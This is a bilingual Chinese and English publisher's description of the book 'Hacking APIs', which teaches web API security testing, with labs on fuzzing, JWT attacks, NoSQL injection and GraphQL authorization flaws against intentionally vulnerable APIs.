黑客API：破坏Web应用程序编程接口（最终版本）

黑客API是web API安全测试的速成课程，它将让你做好渗透测试API的准备，在bug bounty程序中获得高额奖励，并让你自己的API更安全。
黑客API是一门关于web API安全测试的速成课程，它将让你做好渗透测试API的准备，在bug bounty程序中获得高额奖励，并让你自己的API更加安全。
您将了解REST和GraphQL API如何在野外工作，并使用Burp套件和Postman建立一个简化的API测试实验室。然后，您将掌握用于侦察、端点分析和模糊化的工具，如Kiterunner和OWASP Amass。接下来，您将学习执行常见的攻击，例如针对API的身份验证机制和web应用程序中常见的注入漏洞的攻击。您还将学习绕过针对这些攻击的保护的技术。
在本书的九个指导性实验室中，您将练习：
•使用模糊技术枚举API用户和端点
•使用邮递员发现过度数据暴露漏洞
•对API身份验证过程执行JSON Web令牌攻击
•结合多种API攻击技术执行NoSQL注入
•攻击GraphQL API以发现损坏的对象级授权漏洞
在本书的最后，你将准备好发现其他黑客没有发现的那些高回报API漏洞，并提高web应用程序的安全性。
Hacking APIs: Breaking Web Application Programming Interfaces (Final Release)
Hacking APIs is a crash course in web API security testing that will prepare you to penetration-test APIs, reap high rewards on bug bounty programs, and make your own APIs more secure.
Hacking APIs is a crash course on web API security testing that will prepare you to penetration-test APIs, reap high rewards on bug bounty programs, and make your own APIs more secure.
You’ll learn how REST and GraphQL APIs work in the wild and set up a streamlined API testing lab with Burp Suite and Postman. Then you’ll master tools useful for reconnaissance, endpoint analysis, and fuzzing, such as Kiterunner and OWASP Amass. Next, you’ll learn to perform common attacks, like those targeting an API’s authentication mechanisms and the injection vulnerabilities commonly found in web applications. You’ll also learn techniques for bypassing protections against these attacks.
In the book’s nine guided labs, which target intentionally vulnerable APIs, you’ll practice:
• Enumerating APIs users and endpoints using fuzzing techniques
• Using Postman to discover an excessive data exposure vulnerability
• Performing a JSON Web Token attack against an API authentication process
• Combining multiple API attack techniques to perform a NoSQL injection
• Attacking a GraphQL API to uncover a broken object level authorization vulnerability
By the end of the book, you’ll be prepared to uncover those high-payout API bugs other hackers aren’t finding and improve the security of applications on the web.

OR